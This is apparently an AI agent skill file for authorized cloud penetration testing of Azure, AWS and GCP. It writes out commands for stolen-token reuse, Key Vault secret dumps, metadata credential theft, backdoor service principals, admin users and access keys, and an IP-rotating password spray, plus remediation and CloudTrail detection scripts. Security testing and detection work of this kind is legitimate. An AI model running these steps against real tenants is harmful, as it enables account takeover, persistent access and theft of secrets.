This skill should be used when the user asks to "perform cloud penetration testing", "assess Azure or AWS or GCP security", "enumerate cloud resources", "exploit cloud misconfigurations", "test O365 security", "extract secrets from cloud environments", or "audit cloud infrastructure". It provides comprehensive techniques for security assessment across major cloud platforms.
---
name: Cloud Penetration Testing
description: This skill should be used when the user asks to "perform cloud penetration testing", "assess Azure or AWS or GCP security", "enumerate cloud resources", "exploit cloud misconfigurations", "test O365 security", "extract secrets from cloud environments", or "audit cloud infrastructure". It provides comprehensive techniques for security assessment across major cloud platforms.
metadata:
  author: zebbern
  version: "1.1"
---

# Cloud Penetration Testing

## Purpose

Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP). This skill covers reconnaissance, authentication testing, resource enumeration, privilege escalation, data extraction, and persistence techniques for authorized cloud security engagements.

## Prerequisites

### Required Tools

```powershell
# Azure tools (PowerShell modules)
Install-Module -Name Az -AllowClobber -Force
Install-Module -Name MSOnline -Force
Install-Module -Name AzureAD -Force
```

```bash
# AWS CLI
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip && sudo ./aws/install

# GCP CLI
curl https://sdk.cloud.google.com | bash
gcloud init

# Additional tools
pip install scoutsuite pacu
```

### Required Knowledge
- Cloud architecture fundamentals
- Identity and Access Management (IAM)
- API authentication mechanisms
- DevOps and automation concepts

### Required Access
- Written authorization for testing
- Test credentials or access tokens
- Defined scope and rules of engagement

## Outputs and Deliverables

1. **Cloud Security Assessment Report** - Comprehensive findings and risk ratings
2. **Resource Inventory** - Enumerated services, storage, and compute instances
3. **Credential Findings** - Exposed secrets, keys, and misconfigurations
4. **Remediation Recommendations** - Hardening guidance per platform

## Core Workflow

### Phase 1: Reconnaissance

Gather initial information about the target's cloud presence:

```bash
# Azure: Get federation info
curl "https://login.microsoftonline.com/getuserrealm.srf?login=user@target.com&xml=1"

# Azure: Get Tenant ID
curl "https://login.microsoftonline.com/target.com/v2.0/.well-known/openid-configuration"

# Enumerate cloud resources by company name
python3 cloud_enum.py -k targetcompany

# Check IP against cloud providers
cat ips.txt | python3 ip2provider.py
```

### Phase 2: Azure Authentication

Authenticate to Azure environments:

```powershell
# Az PowerShell Module
Import-Module Az
Connect-AzAccount

# With credentials (may bypass MFA)
$credential = Get-Credential
Connect-AzAccount -Credential $credential

# Import stolen context
Import-AzContext -Profile 'C:\Temp\StolenToken.json'

# Export context for persistence
Save-AzContext -Path C:\Temp\AzureAccessToken.json

# MSOnline Module
Import-Module MSOnline
Connect-MsolService
```

### Phase 3: Azure Enumeration

Discover Azure resources and permissions:

```powershell
# List contexts and subscriptions
Get-AzContext -ListAvailable
Get-AzSubscription

# Current user role assignments
Get-AzRoleAssignment

# List resources
Get-AzResource
Get-AzResourceGroup

# Storage accounts
Get-AzStorageAccount

# Web applications
Get-AzWebApp

# SQL Servers and databases
Get-AzSqlServer
Get-AzSqlDatabase -ServerName $Server -ResourceGroupName $RG

# Virtual machines
Get-AzVM
$vm = Get-AzVM -Name "VMName"
$vm.OSProfile

# List all users
Get-MsolUser -All

# List all groups
Get-MsolGroup -All

# Global Admins (members of the "Company Administrator" directory role)
$role = Get-MsolRole -RoleName "Company Administrator"
Get-MsolRoleMember -RoleObjectId $role.ObjectId

# Service Principals
Get-MsolServicePrincipal
```

### Phase 4: Azure Exploitation

Exploit Azure misconfigurations:

```powershell
# Search user attributes for passwords
$users = Get-MsolUser -All
foreach($user in $users){
    $props = @()
    $user | Get-Member | ForEach-Object { $props += $_.Name }
    foreach($prop in $props){
        if($user.$prop -like "*password*"){
            Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)
        }
    }
}

# Execute commands on VMs
Invoke-AzVMRunCommand -ResourceGroupName $RG -VMName $VM -CommandId RunPowerShellScript -ScriptPath ./script.ps1

# Extract VM UserData
$vms = Get-AzVM
$vms.UserData

# Dump Key Vault secrets (Azure CLI)
az keyvault list --query '[].name' --output tsv
az keyvault set-policy --name <vault> --upn <user> --secret-permissions get list
az keyvault secret list --vault-name <vault> --query '[].id' --output tsv
az keyvault secret show --id <URI>
```

### Phase 5: Azure Persistence

Establish persistence in Azure:

```powershell
# Create backdoor service principal
$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)

# Add service principal to Global Admin
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
$role = Get-MsolRole -RoleName "Company Administrator"
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId

# Login as service principal
$cred = Get-Credential # AppID as username, secret as password
Connect-AzAccount -Credential $cred -Tenant "tenant-id" -ServicePrincipal

# Create new admin user via CLI
az ad user create --display-name <name> --password <pass> --user-principal-name <upn>
```

### Phase 6: AWS Authentication

Authenticate to AWS environments:

```bash
# Configure AWS CLI
aws configure
# Enter: Access Key ID, Secret Access Key, Region, Output format

# Use specific profile
aws configure --profile target

# Test credentials
aws sts get-caller-identity
```

### Phase 7: AWS Enumeration

Discover AWS resources:

```bash
# Account information
aws sts get-caller-identity
aws iam list-users
aws iam list-roles

# S3 Buckets
aws s3 ls
aws s3 ls s3://bucket-name/
aws s3 sync s3://bucket-name ./local-dir

# EC2 Instances
aws ec2 describe-instances

# RDS Databases
aws rds describe-db-instances --region us-east-1

# Lambda Functions
aws lambda list-functions --region us-east-1
aws lambda get-function --function-name <name>

# EKS Clusters
aws eks list-clusters --region us-east-1

# Networking
aws ec2 describe-subnets
aws ec2 describe-security-groups --group-ids <sg-id>
aws directconnect describe-connections
```

### Phase 8: AWS Exploitation

Exploit AWS misconfigurations:

```bash
# Check for public RDS snapshots (query quoted so the shell does not glob it)
aws rds describe-db-snapshots --snapshot-type manual --query 'DBSnapshots[*].DBSnapshotIdentifier'
aws rds describe-db-snapshot-attributes --db-snapshot-identifier <id>
# AttributeValues = "all" means publicly accessible

# Extract Lambda environment variables (may contain secrets)
aws lambda get-function --function-name <name> | jq '.Configuration.Environment'

# Access metadata service (from compromised EC2)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

# IMDSv2 access (session token first, then token header on every request)
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"
```

### Phase 9: AWS Persistence

Establish persistence in AWS:

```bash
# List existing access keys
aws iam list-access-keys --user-name <username>

# Create backdoor access key
aws iam create-access-key --user-name <username>

# Get all EC2 public IPs
for region in $(cat regions.txt); do
    aws ec2 describe-instances --query 'Reservations[].Instances[].PublicIpAddress' --region "$region" | jq -r '.[]'
done
```

### Phase 10: GCP Enumeration

Discover GCP resources:

```bash
# Authentication
gcloud auth login
gcloud auth activate-service-account --key-file creds.json
gcloud auth list

# Account information
gcloud config list
gcloud organizations list
gcloud projects list

# IAM Policies
gcloud organizations get-iam-policy <org-id>
gcloud projects get-iam-policy <project-id>

# Enabled services
gcloud services list

# Source code repos
gcloud source repos list
gcloud source repos clone <repo>

# Compute instances
gcloud compute instances list
gcloud beta compute ssh --zone "region" "instance" --project "project"

# Storage buckets
gsutil ls
gsutil ls -r gs://bucket-name
gsutil cp gs://bucket/file ./local

# SQL instances
gcloud sql instances list
gcloud sql databases list --instance <id>

# Kubernetes
gcloud container clusters list
gcloud container clusters get-credentials <cluster> --region <region>
kubectl cluster-info
```

### Phase 11: GCP Exploitation

Exploit GCP misconfigurations:

```bash
# Get metadata service data
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" -H "Metadata-Flavor: Google"

# Check access scopes
curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor: Google'

# Decrypt data with keyring
gcloud kms decrypt --ciphertext-file=encrypted.enc --plaintext-file=out.txt --key <key> --keyring <keyring> --location global

# Serverless function analysis
gcloud functions list
gcloud functions describe <name>
gcloud functions logs read <name> --limit 100

# Find stored credentials
sudo find /home -name "credentials.db"
sudo cp -r /home/user/.config/gcloud ~/.config
gcloud auth list
```

## Quick Reference

### Azure Key Commands

| Action | Command |
|--------|---------|
| Login | `Connect-AzAccount` |
| List subscriptions | `Get-AzSubscription` |
| List users | `Get-MsolUser -All` |
| List groups | `Get-MsolGroup -All` |
| Current roles | `Get-AzRoleAssignment` |
| List VMs | `Get-AzVM` |
| List storage | `Get-AzStorageAccount` |
| Key Vault secrets | `az keyvault secret list --vault-name <name>` |

### AWS Key Commands

| Action | Command |
|--------|---------|
| Configure | `aws configure` |
| Caller identity | `aws sts get-caller-identity` |
| List users | `aws iam list-users` |
| List S3 buckets | `aws s3 ls` |
| List EC2 | `aws ec2 describe-instances` |
| List Lambda | `aws lambda list-functions` |
| Metadata | `curl http://169.254.169.254/latest/meta-data/` |

### GCP Key Commands

| Action | Command |
|--------|---------|
| Login | `gcloud auth login` |
| List projects | `gcloud projects list` |
| List instances | `gcloud compute instances list` |
| List buckets | `gsutil ls` |
| List clusters | `gcloud container clusters list` |
| IAM policy | `gcloud projects get-iam-policy <project>` |
| Metadata | `curl -H "Metadata-Flavor: Google" http://metadata.google.internal/...` |

### Metadata Service URLs

| Provider | URL |
|----------|-----|
| AWS | `http://169.254.169.254/latest/meta-data/` |
| Azure | `http://169.254.169.254/metadata/instance?api-version=2018-02-01` |
| GCP | `http://metadata.google.internal/computeMetadata/v1/` |

### Useful Tools

| Tool | Purpose |
|------|---------|
| ScoutSuite | Multi-cloud security auditing |
| Pacu | AWS exploitation framework |
| AzureHound | Azure AD attack path mapping |
| ROADTools | Azure AD enumeration |
| WeirdAAL | AWS service enumeration |
| MicroBurst | Azure security assessment |
| PowerZure | Azure post-exploitation |

## Constraints and Limitations

### Legal Requirements
- Only test with explicit written authorization
- Respect scope boundaries between cloud accounts
- Do not access production customer data
- Document all testing activities

### Technical Limitations
- MFA may prevent credential-based attacks
- Conditional Access policies may restrict access
- CloudTrail/Activity Logs record all API calls
- Some resources require specific regional access

### Detection Considerations
- Cloud providers log all API activity
- Unusual access patterns trigger alerts
- Use slow, deliberate enumeration
- Consider GuardDuty, Security Center, Cloud Armor

## Examples

### Example 1: Azure Password Spray

**Scenario:** Test Azure AD password policy

```powershell
# Using MSOLSpray with FireProx for IP rotation
# First create FireProx endpoint
python fire.py --access_key <key> --secret_access_key <secret> --region us-east-1 --url https://login.microsoft.com --command create

# Spray passwords
Import-Module .\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\users.txt -Password "Spring2024!" -URL https://<api-gateway>.execute-api.us-east-1.amazonaws.com/fireprox
```

### Example 2: AWS S3 Bucket Enumeration

**Scenario:** Find and access misconfigured S3 buckets

```bash
# List all buckets
aws s3 ls | awk '{print $3}' > buckets.txt

# Check each bucket for contents
while read bucket; do
    echo "Checking: $bucket"
    aws s3 ls "s3://$bucket" 2>/dev/null
done < buckets.txt

# Download interesting bucket
aws s3 sync s3://misconfigured-bucket ./loot/
```

### Example 3: GCP Service Account Compromise

**Scenario:** Pivot using a compromised service account

```bash
# Authenticate with service account key
gcloud auth activate-service-account --key-file compromised-sa.json

# List accessible projects
gcloud projects list

# Enumerate compute instances
gcloud compute instances list --project target-project

# Check for SSH keys in metadata
gcloud compute project-info describe --project target-project | grep ssh

# SSH to instance
gcloud beta compute ssh instance-name --zone us-central1-a --project target-project
```

## Troubleshooting

| Issue | Solutions |
|-------|-----------|
| Authentication failures | Verify credentials; check MFA; ensure correct tenant/project; try alternative auth methods |
| Permission denied | List current roles; try different resources; check resource policies; verify region |
| Metadata service blocked | Check IMDSv2 (AWS); verify instance role; check firewall for 169.254.169.254 |
| Rate limiting | Add delays; spread across regions; use multiple credentials; focus on high-value targets |

## References

- [Advanced Cloud Scripts](references/advanced-cloud-scripts.md) - Azure Automation runbooks, Function Apps enumeration, AWS data exfiltration, GCP advanced exploitation
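### Example 4: Auditing the Phase 8 findings offline

The two AWS checks in Phase 8 (a manual RDS snapshot whose `restore` attribute contains `"all"`, and Lambda environment variables that look like credentials) are easy to misread by eye across many resources. The script below is an added example, not part of this skill's own scripts: it parses the JSON that `aws rds describe-db-snapshot-attributes` and `aws lambda get-function` print (the document shapes are the real CLI ones; the identifiers and values are constructed for this example) and reports which resources need remediation.

```python
import json
import re
from typing import Dict, List

# Constructed sample of `aws rds describe-db-snapshot-attributes` output.
# Shape follows the AWS CLI; the snapshot name is made up.
SNAPSHOT_ATTRS = json.loads("""
{
  "DBSnapshotAttributesResult": {
    "DBSnapshotIdentifier": "prod-db-final-snapshot",
    "DBSnapshotAttributes": [
      {"AttributeName": "restore", "AttributeValues": ["all"]}
    ]
  }
}
""")

# Constructed sample of (trimmed) `aws lambda get-function` output.
LAMBDA_FUNC = json.loads("""
{
  "Configuration": {
    "FunctionName": "billing-sync",
    "Environment": {
      "Variables": {
        "DB_HOST": "db.internal",
        "DB_PASSWORD": "hunter2",
        "STRIPE_API_KEY": "sk_test_example",
        "LOG_LEVEL": "info"
      }
    }
  }
}
""")

# Variable names that usually carry a credential rather than plain config.
SECRET_KEY_RE = re.compile(r"(PASS(WORD)?|SECRET|TOKEN|API_?KEY|PRIVATE_?KEY)", re.I)

def snapshot_restore_principals(attrs: Dict) -> List[str]:
    """Account IDs allowed to restore the snapshot; the value 'all' means public."""
    result = attrs["DBSnapshotAttributesResult"]
    for attr in result.get("DBSnapshotAttributes", []):
        if attr.get("AttributeName") == "restore":
            return list(attr.get("AttributeValues", []))
    return []

def is_public_snapshot(attrs: Dict) -> bool:
    return "all" in snapshot_restore_principals(attrs)

def secret_like_env_vars(func: Dict) -> List[str]:
    """Environment variable names whose key suggests a stored credential."""
    env = func.get("Configuration", {}).get("Environment", {}).get("Variables", {})
    return sorted(k for k in env if SECRET_KEY_RE.search(k))

if __name__ == "__main__":
    ident = SNAPSHOT_ATTRS["DBSnapshotAttributesResult"]["DBSnapshotIdentifier"]
    print(f"{ident}: public={is_public_snapshot(SNAPSHOT_ATTRS)}")
    print("secret-like Lambda variables:", secret_like_env_vars(LAMBDA_FUNC))
```

Feed it real CLI output with `json.loads(subprocess.check_output([...]))` in place of the constructed samples; a public snapshot is fixed with `aws rds modify-db-snapshot-attribute ... --values-to-remove all`, and flagged variables belong in Secrets Manager or Parameter Store rather than the function configuration.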
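### Example 5: Detecting the Phase 8 and 9 techniques in CloudTrail

The Detection Considerations section notes that CloudTrail records every API call, which is exactly what a blue team uses to catch the persistence and exposure steps in Phases 8 and 9. This added example (not part of this skill) runs a small rule set over constructed CloudTrail-style records: field names follow CloudTrail (`eventName`, `userIdentity.userName`, `requestParameters`), while every identity, IP address and timestamp is made up.

```python
import json
from typing import Dict, List, Optional, Tuple

# Constructed CloudTrail-style records, one JSON object per line.
SAMPLE_EVENTS = [json.loads(line) for line in """
{"eventTime":"2024-05-01T10:00:00Z","eventSource":"iam.amazonaws.com","eventName":"CreateAccessKey","userIdentity":{"type":"IAMUser","userName":"alice"},"requestParameters":{"userName":"alice"},"sourceIPAddress":"203.0.113.10"}
{"eventTime":"2024-05-01T10:05:00Z","eventSource":"iam.amazonaws.com","eventName":"CreateAccessKey","userIdentity":{"type":"IAMUser","userName":"alice"},"requestParameters":{"userName":"svc-deploy"},"sourceIPAddress":"198.51.100.7"}
{"eventTime":"2024-05-01T10:06:00Z","eventSource":"iam.amazonaws.com","eventName":"CreateUser","userIdentity":{"type":"IAMUser","userName":"alice"},"requestParameters":{"userName":"backup-admin"},"sourceIPAddress":"198.51.100.7"}
{"eventTime":"2024-05-01T10:10:00Z","eventSource":"rds.amazonaws.com","eventName":"ModifyDBSnapshotAttribute","userIdentity":{"type":"IAMUser","userName":"alice"},"requestParameters":{"dBSnapshotIdentifier":"prod-db-final","attributeName":"restore","valuesToAdd":["all"]},"sourceIPAddress":"198.51.100.7"}
{"eventTime":"2024-05-01T10:12:00Z","eventSource":"ec2.amazonaws.com","eventName":"DescribeInstances","userIdentity":{"type":"IAMUser","userName":"alice"},"requestParameters":{},"sourceIPAddress":"203.0.113.10"}
""".strip().splitlines()]

def classify(event: Dict) -> Optional[str]:
    """Label an event that matches a Phase 8/9 technique, or None if benign."""
    name = event.get("eventName")
    params = event.get("requestParameters") or {}
    actor = event.get("userIdentity", {}).get("userName")
    # Backdoor key: a principal minting an access key for someone else.
    if name == "CreateAccessKey" and params.get("userName") != actor:
        return f"access key created for another principal: {params.get('userName')}"
    # New IAM identity; rare enough in most accounts to review every time.
    if name == "CreateUser":
        return f"new IAM user created: {params.get('userName')}"
    # The call that makes a manual RDS snapshot world-restorable.
    if name == "ModifyDBSnapshotAttribute" and "all" in (params.get("valuesToAdd") or []):
        return f"RDS snapshot made public: {params.get('dBSnapshotIdentifier')}"
    return None

def findings(events: List[Dict]) -> List[Tuple[str, str, str]]:
    """(eventTime, sourceIPAddress, label) for every suspicious record."""
    out = []
    for ev in events:
        label = classify(ev)
        if label:
            out.append((ev["eventTime"], ev["sourceIPAddress"], label))
    return out

if __name__ == "__main__":
    for when, ip, label in findings(SAMPLE_EVENTS):
        print(f"{when} {ip} {label}")
```

The same three rules translate directly into CloudWatch metric filters or GuardDuty-adjacent SIEM queries; the first record (a user rotating their own key) is deliberately not flagged so the rule stays quiet on routine rotation.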